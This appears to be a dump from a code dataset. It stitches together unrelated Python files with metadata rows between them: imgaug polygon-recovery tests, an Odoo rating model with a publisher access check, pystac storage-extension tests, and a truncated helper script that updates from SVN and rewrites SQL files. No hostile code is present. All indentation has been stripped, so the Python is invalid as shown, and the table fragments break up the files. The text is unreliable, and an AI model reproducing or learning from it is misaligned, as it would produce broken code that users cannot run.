+ (point[1] - point_ext[1])**2
)
if dist < 0.025:
found[i] = True
assert all(found)
# duplicate points
poly = [(0, 0), (1, 0), (1, 0), (1, 1)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.01:
found[i] = True
assert all(found)
# other broken poly
poly = [(0, 0), (0.5, 0), (0.5, 1.2), (1, 0), (1, 1), (0, 1)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.025:
found[i] = True
assert all(found)
def test_recover_from_random_polygons(self):
cpr = _ConcavePolygonRecoverer()
nb_iterations = 10
height, width = 10, 20
nb_points_matrix = np.random.randint(3, 30, size=(nb_iterations,))
for nb_points in nb_points_matrix:
points = np.random.random(size=(nb_points, 2))
points[:, 0] *= width
points[:, 1] *= height
# currently mainly used to copy the label, so not a significant
# issue that it is not concave
old_polygon = ia.Polygon(points)
poly_concave = cpr.recover_from(points, old_polygon)
assert poly_concave.is_valid
# test if all points are in BB around returned polygon
# would be better to directly call a polygon.contains(point) method
# but that does not yet exist
xx = poly_concave.exterior[:, 0]
yy = poly_concave.exterior[:, 1]
bb_x1, bb_x2 = min(xx), max(xx)
bb_y1, bb_y2 = min(yy), max(yy)
bb = ia.BoundingBox(x1=bb_x1-1e-4, y1=bb_y1-1e-4, x2=bb_x2+1e-4, y2=bb_y2+1e-4)
for point in points:
assert bb.contains(ia.Keypoint(x=point[0], y=point[1]))
def test__remove_consecutive_duplicate_points(self):
recoverer = _ConcavePolygonRecoverer()
points = [(0, 0), (1, 1)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
points
)
points = [(0.0, 0.5), (1.0, 1.0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
np.float32(points)
)
points = np.float32([(0.0, 0.5), (1.0, 1.0)])
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
np.float32(points)
)
points = [(0, 0), (0, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (0, 0), (1, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (1, 0), (1, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0)],
atol=1e-8, rtol=0
)
points = [(0, 0), (1, 0), (1, 0), (2, 0), (0, 0)]
assert np.allclose(
recoverer._remove_consecutive_duplicate_points(points),
[(0, 0), (1, 0), (2, 0)],
atol=1e-8, rtol=0
)
def test__jitter_duplicate_points(self):
cpr = _ConcavePolygonRecoverer(threshold_duplicate_points=1e-4)
points = [(0, 0), (1, 0), (1, 1), (0, 1)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
points = [(0, 0), (1, 0), (0, 1)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
points = [(0, 0), (0.01, 0), (0.01, 0.01), (0, 0.01)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(points, points_jittered, rtol=0, atol=1e-4)
points = [(0, 0), (1, 0), (1 + 1e-6, 0), (1, 1), (0, 1)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(
[point for i, point in enumerate(points_jittered) if i in [0, 1, 3, 4]],
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0,
atol=1e-5
)
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[2])) >= 1e-4
points = [(0, 0), (1, 0), (1, 1), (1 + 1e-6, 0), (0, 1)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(
[point for i, point in enumerate(points_jittered) if i in [0, 1, 2, 4]],
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0,
atol=1e-5
)
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[3])) >= 1e-4
points = [(0, 0), (1, 0), (1, 1), (0, 1), (1 + 1e-6, 0)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(
[point for i, point in enumerate(points_jittered) if i in [0, 1, 2, 3]],
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0,
atol=1e-5
)
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[4])) >= 1e-4
points = [(0, 0), (1, 0), (1 + 1e-6, 0), (1, 1), (1 + 1e-6, 0), (0, 1),
(1 + 1e-6, 0), (1 + 1e-6, 0 + 1e-6), (1 + 1e-6, 0 + 2e-6)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(
[point for i, point in enumerate(points_jittered) if i in [0, 1, 3, 5]],
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0,
atol=1e-5
)
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[2])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[4])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[6])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[7])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[8])) >= 1e-4
points = [(0, 0), (1, 0), (0 + 1e-6, 0 - 1e-6), (1 + 1e-6, 0), (1, 1),
(1 + 1e-6, 0), (0, 1), (1 + 1e-6, 0), (1 + 1e-6, 0 + 1e-6),
(1 + 1e-6, 0 + 2e-6)]
points_jittered = cpr._jitter_duplicate_points(points, np.random.RandomState(0))
assert np.allclose(
[point for i, point in enumerate(points_jittered) if i in [0, 1, 4, 6]],
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0,
atol=1e-5
)
assert np.linalg.norm(np.float32([0, 0]) - np.float32(points_jittered[2])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[3])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[5])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[7])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[8])) >= 1e-4
assert np.linalg.norm(np.float32([1, 0]) - np.float32(points_jittered[9])) >= 1e-4
def test__calculate_circumference(self):
points = [(0, 0), (1, 0), (1, 1), (0, 1)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = np.float32([(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)])
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 4)
points = [(0, 0), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0)]
circ = _ConcavePolygonRecoverer._calculate_circumference(points)
assert np.allclose(circ, 6)
def test__fit_best_valid_polygon(self):
def _assert_ids_match(observed, expected):
assert len(observed) == len(expected), "len mismatch: %d vs %d" % (len(observed), len(expected))
max_count = 0
for i in range(len(observed)):
counter = 0
for j in range(i, i+len(expected)):
if observed[(i+j) % len(observed)] == expected[j % len(expected)]:
counter += 1
else:
break
max_count = max(max_count, counter)
assert max_count == len(expected), "count mismatch: %d vs %d" % (max_count, len(expected))
cpr = _ConcavePolygonRecoverer()
points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
# doing this without the list(.) wrappers fails on python2.7
assert list(points_fit) == list(sm.xrange(len(points)))
# square-like, but top line has one point in its center which's
# y-coordinate is below the bottom line
points = [(0.0, 0.0), (0.45, 0.0), (0.5, 1.5), (0.55, 0.0), (1.0, 0.0),
(1.0, 1.0), (0.0, 1.0)]
points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
_assert_ids_match(points_fit, [0, 1, 3, 4, 5, 2, 6])
assert ia.Polygon([points[idx] for idx in points_fit]).is_valid
# |--| |--|
# | | | |
# | | | |
# |--|--|--|
# | |
# ----
# the intersection points on the bottom line are not provided,
# hence the result is expected to have triangles at the bottom left
# and right
points = [(0.0, 0), (0.25, 0), (0.25, 1.25),
(0.75, 1.25), (0.75, 0), (1.0, 0),
(1.0, 1.0), (0.0, 1.0)]
points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
_assert_ids_match(points_fit, [0, 1, 4, 5, 6, 3, 2, 7])
poly_observed = ia.Polygon([points[idx] for idx in points_fit])
assert poly_observed.is_valid
# same as above, but intersection points at the bottom line are provided
# without oversampling, i.e. incorporating these points would lead to an
# invalid polygon
points = [(0.0, 0), (0.25, 0), (0.25, 1.0), (0.25, 1.25),
(0.75, 1.25), (0.75, 1.0), (0.75, 0), (1.0, 0),
(1.0, 1.0), (0.0, 1.0)]
points_fit = cpr._fit_best_valid_polygon(points, random_state=np.random.RandomState(0))
assert len(points_fit) >= len(points) - 2 # TODO add IoU check here
poly_observed = ia.Polygon([points[idx] for idx in points_fit])
assert poly_observed.is_valid
def test__fix_polygon_is_line(self):
cpr = _ConcavePolygonRecoverer()
points = [(0, 0), (1, 0), (1, 1)]
points_fixed = cpr._fix_polygon_is_line(points, np.random.RandomState(0))
assert np.allclose(points_fixed, points, atol=0, rtol=0)
points = [(0, 0), (1, 0), (2, 0)]
points_fixed = cpr._fix_polygon_is_line(points, np.random.RandomState(0))
assert not np.allclose(points_fixed, points, atol=0, rtol=0)
assert not cpr._is_polygon_line(points_fixed)
assert np.allclose(points_fixed, points, rtol=0, atol=1e-2)
points = [(0, 0), (0, 1), (0, 2)]
points_fixed = cpr._fix_polygon_is_line(points, np.random.RandomState(0))
assert not np.allclose(points_fixed, points, atol=0, rtol=0)
assert not cpr._is_polygon_line(points_fixed)
assert np.allclose(points_fixed, points, rtol=0, atol=1e-2)
points = [(0, 0), (1, 1), (2, 2)]
points_fixed = cpr._fix_polygon_is_line(points, np.random.RandomState(0))
assert not np.allclose(points_fixed, points, atol=0, rtol=0)
assert not cpr._is_polygon_line(points_fixed)
assert np.allclose(points_fixed, points, rtol=0, atol=1e-2)
def test__is_polygon_line(self):
points = [(0, 0), (1, 0), (1, 1)]
assert not _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (1, 1), (0, 1)]
assert not _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
assert not _ConcavePolygonRecoverer._is_polygon_line(points)
points = np.float32([(0, 0), (1, 0), (1, 1), (0, 1)])
assert not _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0)]
assert _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (2, 0)]
assert _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (1, 0)]
assert _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (1, 0), (2, 0)]
assert _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (1, 0), (2, 0), (0.5, 0)]
assert _ConcavePolygonRecoverer._is_polygon_line(points)
points = [(0, 0), (1, 0), (1, 0), (2, 0), (1, 1)]
assert not _ConcavePolygonRecoverer._is_polygon_line(points)
def test__generate_intersection_points(self):
cpr = _ConcavePolygonRecoverer()
# triangle
points = [(0.5, 0), (1, 1), (0, 1)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
assert points_inter == [[], [], []]
# rotated square
points = [(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
assert points_inter == [[], [], [], []]
# square
points = [(0, 0), (1, 0), (1, 1), (0, 1)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
assert points_inter == [[], [], [], []]
# |--| |--|
# | |__| |
# | |
# |--------|
points = [(0.0, 0), (0.25, 0), (0.25, 0.25),
(0.75, 0.25), (0.75, 0), (1.0, 0),
(1.0, 1.0), (0.0, 1.0)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
assert points_inter == [[], [], [], [], [], [], [], []]
# same as above, but middle part goes much further down,
# crossing the bottom line
points = [(0.0, 0), (0.25, 0), (0.25, 1.25),
(0.75, 1.25), (0.75, 0), (1.0, 0),
(1.0, 1.0), (0.0, 1.0)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
self._assert_points_are_identical(
points_inter,
[[], [(0.25, 1.0)], [], [(0.75, 1.0)], [], [], [(0.75, 1.0), (0.25, 1.0)], []])
# square-like structure with intersections in top right area
points = [(0, 0), (0.5, 0), (1.01, 0.5), (1.0, 0), (1, 1), (0, 1), (0, 0)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
self._assert_points_are_identical(
points_inter,
[[], [(1.0, 0.4902)], [], [(1.0, 0.4902)], [], [], []],
atol=1e-2)
# same as above, but with a second intersection in bottom left
points = [(0, 0), (0.5, 0), (1.01, 0.5), (1.0, 0), (1, 1), (-0.25, 1),
(0, 1.25)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
self._assert_points_are_identical(
points_inter,
[[], [(1.0, 0.4902)], [], [(1.0, 0.4902)], [(0, 1.0)], [], [(0, 1.0)]],
atol=1e-2)
# double triangle with point in center that is shared by both triangles
points = [(0, 0), (0.5, 0.5), (1.0, 0), (1.0, 1.0), (0.5, 0.5), (0, 1.0)]
points_inter = cpr._generate_intersection_points(points, one_point_per_intersection=False)
self._assert_points_are_identical(
points_inter,
[[], [], [], [], [], []])
def test__oversample_intersection_points(self):
cpr = _ConcavePolygonRecoverer()
cpr.oversampling = 0.1
points = [(0.0, 0.0), (1.0, 0.0)]
segment_add_points_sorted = [[(0.5, 0.0)], []]
points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
self._assert_points_are_identical(
points_oversampled,
[[(0.45, 0.0), (0.5, 0.0), (0.55, 0.0)], []],
atol=1e-4
)
points = [(0.0, 0.0), (2.0, 0.0)]
segment_add_points_sorted = [[(0.5, 0.0)], []]
points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
self._assert_points_are_identical(
points_oversampled,
[[(0.45, 0.0), (0.5, 0.0), (0.65, 0.0)], []],
atol=1e-4
)
points = [(0.0, 0.0), (1.0, 0.0)]
segment_add_points_sorted = [[(0.5, 0.0), (0.6, 0.0)], []]
points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
self._assert_points_are_identical(
points_oversampled,
[[(0.45, 0.0), (0.5, 0.0), (0.51, 0.0), (0.59, 0.0), (0.6, 0.0), (0.64, 0.0)], []],
atol=1e-4
)
points = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
segment_add_points_sorted = [[(0.5, 0.0)], [], [(0.8, 1.0)], [(0.0, 0.7)]]
points_oversampled = cpr._oversample_intersection_points(points, segment_add_points_sorted)
self._assert_points_are_identical(
points_oversampled,
[[(0.45, 0.0), (0.5, 0.0), (0.55, 0.0)],
[],
[(0.82, 1.0), (0.8, 1.0), (0.72, 1.0)],
[(0.0, 0.73), (0.0, 0.7), (0.0, 0.63)]],
atol=1e-4
)
def test__insert_intersection_points(self):
points = [(0, 0), (1, 0), (2, 0)]
segments_add_point_sorted = [[], [], []]
points_inserted = _ConcavePolygonRecoverer._insert_intersection_points(
points, segments_add_point_sorted)
assert points_inserted == points
segments_add_point_sorted = [[(0.5, 0)], [], []]
points_inserted = _ConcavePolygonRecoverer._insert_intersection_points(
points, segments_add_point_sorted)
assert points_inserted == [(0, 0), (0.5, 0), (1, 0), (2, 0)]
segments_add_point_sorted = [[(0.5, 0), (0.75, 0)], [], []]
points_inserted = _ConcavePolygonRecoverer._insert_intersection_points(
points, segments_add_point_sorted)
assert points_inserted == [(0, 0), (0.5, 0), (0.75, 0), (1, 0), (2, 0)]
segments_add_point_sorted = [[(0.5, 0)], [(1.5, 0)], []]
points_inserted = _ConcavePolygonRecoverer._insert_intersection_points(
points, segments_add_point_sorted)
assert points_inserted == [(0, 0), (0.5, 0), (1, 0), (1.5, 0), (2, 0)]
segments_add_point_sorted = [[(0.5, 0)], [(1.5, 0)], [(2.5, 0)]]
points_inserted = _ConcavePolygonRecoverer._insert_intersection_points(
points, segments_add_point_sorted)
assert points_inserted == [(0, 0), (0.5, 0), (1, 0), (1.5, 0), (2, 0),
(2.5, 0)]
| 38.514821 | 118 | 0.537316 |
3c5f3586c59170276008997238b98e46b8f3cba1 | 1,184 | py | Python | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | odoo-13.0/addons/website_rating/models/rating.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import fields, models, exceptions, _
class Rating(models.Model):
_inherit = 'rating.rating'
# Add this related field to mail.message for performance reason
website_published = fields.Boolean(related='message_id.website_published', store=True, readonly=False)
# Adding information for comment a rating message
publisher_comment = fields.Text("Publisher Comment")
publisher_id = fields.Many2one('res.partner', 'Commented by',
ondelete='set null', readonly=True)
publisher_datetime = fields.Datetime("Commented on", readonly=True)
def write(self, values):
if values.get('publisher_comment'):
if not self.env.user.has_group("website.group_website_publisher"):
raise exceptions.AccessError(_("Only the publisher of the website can change the rating comment"))
if not values.get('publisher_datetime'):
values['publisher_datetime'] = fields.Datetime.now()
if not values.get('publisher_id'):
values['publisher_id'] = self.env.user.partner_id.id
return super(Rating, self).write(values)
| 45.538462 | 114 | 0.669764 |
f24f87f67193b1e2ebef8bfcda90dd0fa644af3f | 12,022 | py | Python | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 60 | 2019-09-09T20:14:08.000Z | 2020-08-19T06:59:33.000Z | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 87 | 2019-09-14T15:47:23.000Z | 2020-08-19T16:23:32.000Z | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 24 | 2019-10-16T17:13:46.000Z | 2020-08-19T04:36:58.000Z | import json
import random
import unittest
from string import ascii_letters
import pystac
from pystac import ExtensionTypeError, Item
from pystac.collection import Collection
from pystac.extensions.storage import StorageExtension, CloudPlatform
from tests.utils import TestCases, assert_to_from_dict
class StorageExtensionTest(unittest.TestCase):
NAIP_EXAMPLE_URI = TestCases.get_path("data-files/storage/item-naip.json")
PLAIN_ITEM_URI = TestCases.get_path("data-files/item/sample-item.json")
NAIP_COLLECTION_URI = TestCases.get_path("data-files/storage/collection-naip.json")
def setUp(self) -> None:
self.maxDiff = None
self.naip_item = Item.from_file(self.NAIP_EXAMPLE_URI)
self.plain_item = Item.from_file(self.PLAIN_ITEM_URI)
self.naip_collection = Collection.from_file(self.NAIP_COLLECTION_URI)
class ItemStorageExtensionTest(StorageExtensionTest):
def test_to_from_dict(self) -> None:
with open(self.NAIP_EXAMPLE_URI) as f:
item_dict = json.load(f)
assert_to_from_dict(self, Item, item_dict)
def test_add_to(self) -> None:
item = self.plain_item
self.assertNotIn(
StorageExtension.get_schema_uri(), self.plain_item.stac_extensions
)
# Check that the URI gets added to stac_extensions
StorageExtension.add_to(item)
self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)
# Check that the URI only gets added once, regardless of how many times add_to
# is called.
StorageExtension.add_to(item)
StorageExtension.add_to(item)
eo_uris = [
uri
for uri in item.stac_extensions
if uri == StorageExtension.get_schema_uri()
]
self.assertEqual(len(eo_uris), 1)
def test_validate_storage(self) -> None:
self.naip_item.validate()
def test_extend_invalid_object(self) -> None:
link = pystac.Link("child", "https://some-domain.com/some/path/to.json")
with self.assertRaises(pystac.ExtensionTypeError):
StorageExtension.ext(link) # type: ignore
def test_extension_not_implemented(self) -> None:
# Should raise exception if Item does not include extension URI
item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
with self.assertRaises(pystac.ExtensionNotImplemented):
_ = StorageExtension.ext(item)
# Should raise exception if owning Item does not include extension URI
asset = item.assets["thumbnail"]
with self.assertRaises(pystac.ExtensionNotImplemented):
_ = StorageExtension.ext(asset)
# Should succeed if Asset has no owner
ownerless_asset = pystac.Asset.from_dict(asset.to_dict())
_ = StorageExtension.ext(ownerless_asset)
def test_item_ext_add_to(self) -> None:
item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
self.assertNotIn(StorageExtension.get_schema_uri(), item.stac_extensions)
_ = StorageExtension.ext(item, add_if_missing=True)
self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)
def test_asset_ext_add_to(self) -> None:
item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
self.assertNotIn(StorageExtension.get_schema_uri(), item.stac_extensions)
asset = item.assets["thumbnail"]
_ = StorageExtension.ext(asset, add_if_missing=True)
self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)
def test_asset_ext_add_to_ownerless_asset(self) -> None:
item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
asset_dict = item.assets["thumbnail"].to_dict()
asset = pystac.Asset.from_dict(asset_dict)
with self.assertRaises(pystac.STACError):
_ = StorageExtension.ext(asset, add_if_missing=True)
def test_should_raise_exception_when_passing_invalid_extension_object(
self,
) -> None:
self.assertRaisesRegex(
ExtensionTypeError,
r"^StorageExtension does not apply to type 'object'$",
StorageExtension.ext,
object(),
)
class StorageExtensionSummariesTest(StorageExtensionTest):
def test_platform(self) -> None:
col = self.naip_collection
col_dict = col.to_dict()
storage_summaries = StorageExtension.summaries(col)
# Get
self.assertEqual(
storage_summaries.platform, col_dict["summaries"]["storage:platform"]
)
# Set
new_platform_summary = [random.choice([v for v in CloudPlatform])]
self.assertNotEqual(storage_summaries.platform, new_platform_summary)
storage_summaries.platform = new_platform_summary
self.assertEqual(storage_summaries.platform, new_platform_summary)
col_dict = col.to_dict()
self.assertEqual(
col_dict["summaries"]["storage:platform"], new_platform_summary
)
def test_region(self) -> None:
col = self.naip_collection
col_dict = col.to_dict()
storage_summaries = StorageExtension.summaries(col)
# Get
self.assertEqual(
storage_summaries.region, col_dict["summaries"]["storage:region"]
)
# Set
new_region_summary = [random.choice(ascii_letters)]
self.assertNotEqual(storage_summaries.region, new_region_summary)
storage_summaries.region = new_region_summary
self.assertEqual(storage_summaries.region, new_region_summary)
col_dict = col.to_dict()
self.assertEqual(col_dict["summaries"]["storage:region"], new_region_summary)
def test_requester_pays(self) -> None:
col = self.naip_collection
col_dict = col.to_dict()
storage_summaries = StorageExtension.summaries(col)
# Get
self.assertEqual(
storage_summaries.requester_pays,
col_dict["summaries"]["storage:requester_pays"],
)
# Set
new_requester_pays_summary = [True]
self.assertNotEqual(
storage_summaries.requester_pays, new_requester_pays_summary
)
storage_summaries.requester_pays = new_requester_pays_summary
self.assertEqual(storage_summaries.requester_pays, new_requester_pays_summary)
col_dict = col.to_dict()
self.assertEqual(
col_dict["summaries"]["storage:requester_pays"], new_requester_pays_summary
)
def test_tier(self) -> None:
col = self.naip_collection
col_dict = col.to_dict()
storage_summaries = StorageExtension.summaries(col)
# Get
self.assertEqual(storage_summaries.tier, col_dict["summaries"]["storage:tier"])
# Set
new_tier_summary = [random.choice(ascii_letters)]
self.assertNotEqual(storage_summaries.tier, new_tier_summary)
storage_summaries.tier = new_tier_summary
self.assertEqual(storage_summaries.tier, new_tier_summary)
col_dict = col.to_dict()
self.assertEqual(col_dict["summaries"]["storage:tier"], new_tier_summary)
def test_summaries_adds_uri(self) -> None:
col = self.naip_collection
col.stac_extensions = []
self.assertRaisesRegex(
pystac.ExtensionNotImplemented,
r"Could not find extension schema URI.*",
StorageExtension.summaries,
col,
False,
)
_ = StorageExtension.summaries(col, add_if_missing=True)
self.assertIn(StorageExtension.get_schema_uri(), col.stac_extensions)
StorageExtension.remove_from(col)
self.assertNotIn(StorageExtension.get_schema_uri(), col.stac_extensions)
class AssetStorageExtensionTest(StorageExtensionTest):
def test_item_apply(self) -> None:
item = self.naip_item
asset = random.choice(list(item.assets.values()))
storage_ext = StorageExtension.ext(asset)
new_platform = random.choice(
[v for v in CloudPlatform if v != storage_ext.platform]
)
new_region = random.choice(ascii_letters)
new_requestor_pays = random.choice(
[v for v in {True, False} if v != storage_ext.requester_pays]
)
new_tier = random.choice(ascii_letters)
storage_ext.apply(
platform=new_platform,
region=new_region,
requester_pays=new_requestor_pays,
tier=new_tier,
)
self.assertEqual(storage_ext.platform, new_platform)
self.assertEqual(storage_ext.region, new_region)
self.assertEqual(storage_ext.requester_pays, new_requestor_pays)
self.assertEqual(storage_ext.tier, new_tier)
def test_platform(self) -> None:
item = self.naip_item
# Grab a random asset with the platform property
asset = random.choice(
[
_asset
for _asset in item.assets.values()
if "storage:platform" in _asset.to_dict()
]
)
storage_ext = StorageExtension.ext(asset)
# Get
self.assertEqual(
storage_ext.platform, asset.extra_fields.get("storage:platform")
)
# Set
new_platform = random.choice(
[val for val in CloudPlatform if val != storage_ext.platform]
)
storage_ext.platform = new_platform
self.assertEqual(storage_ext.platform, new_platform)
item.validate()
def test_region(self) -> None:
item = self.naip_item
# Grab a random asset with the platform property
asset = random.choice(
[
_asset
for _asset in item.assets.values()
if "storage:region" in _asset.to_dict()
]
)
storage_ext = StorageExtension.ext(asset)
# Get
self.assertEqual(storage_ext.region, asset.extra_fields.get("storage:region"))
# Set
new_region = random.choice(
[val for val in CloudPlatform if val != storage_ext.region]
)
storage_ext.region = new_region
self.assertEqual(storage_ext.region, new_region)
item.validate()
# Set to None
storage_ext.region = None
self.assertNotIn("storage:region", asset.extra_fields)
def test_requester_pays(self) -> None:
item = self.naip_item
# Grab a random asset with the platform property
asset = random.choice(
[
_asset
for _asset in item.assets.values()
if "storage:requester_pays" in _asset.to_dict()
]
)
storage_ext = StorageExtension.ext(asset)
# Get
self.assertEqual(
storage_ext.requester_pays, asset.extra_fields.get("storage:requester_pays")
)
# Set
new_requester_pays = True if not storage_ext.requester_pays else False
storage_ext.requester_pays = new_requester_pays
self.assertEqual(storage_ext.requester_pays, new_requester_pays)
item.validate()
# Set to None
storage_ext.requester_pays = None
self.assertNotIn("storage:requester_pays", asset.extra_fields)
def test_tier(self) -> None:
item = self.naip_item
# Grab a random asset with the platform property
asset = random.choice(
[
_asset
for _asset in item.assets.values()
if "storage:tier" in _asset.to_dict()
]
)
storage_ext = StorageExtension.ext(asset)
# Get
self.assertEqual(storage_ext.tier, asset.extra_fields.get("storage:tier"))
# Set
new_tier = random.choice(ascii_letters)
storage_ext.tier = new_tier
self.assertEqual(storage_ext.tier, new_tier)
item.validate()
# Set to None
storage_ext.tier = None
self.assertNotIn("storage:tier", asset.extra_fields)
| 33.581006 | 88 | 0.65297 |
2be1089a4679f0e8a7259599e7dceafd8a679054 | 2,601 | py | Python | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | import os
import re
import originSqlRefine
import sys
import myUtil
def main(path):
print('path='+path)
myUtil.myPopen(myUtil.svnCmd + ' up', path, encoding='gbk')
outpath = r'.\sql\\'
if not os.path.isdir(outpath):
os.mkdir(outpath)
for i in os.listdir(path):
if i.endswith(".sql") :
i = i.lower()
print(i)
tablename = i.replace(".sql", '')
print('tablename=' + tablename)
with open(path + i, 'r') as f:
sqls = f.read().split(';')
print( sqls[0])
fout = open(outpath + i, 'w')
for sql in sqls:
sql = sql.strip()
if (sql.startswith('BEGIN') or sql.startswith('COMMIT') or len(sql) == 0):
continue
m = re.findall(r'\".+?\"',sql)
for word in m:
wordnew = word[1:-1]
sql = sql.replace(word, wordnew)
m = re.findall(r'\`.+?\`',sql)
for word in m:
wordnew = word[1:-1]
sql = sql.replace(word, wordnew)
sql = sql.replace('\n', ' ')
sql = sql.replace('UNIQUE', ' ')
# if (tablename == 'clubs') :
# print (sql)
#change table name to lower case
if tablename in sql.lower():
print('sub:'+tablename)
sql = re.sub(tablename, tablename.lower(), sql, flags=re.IGNORECASE)
if sql.startswith('INSERT INTO club_information'):
index = sql.find('VALUE')
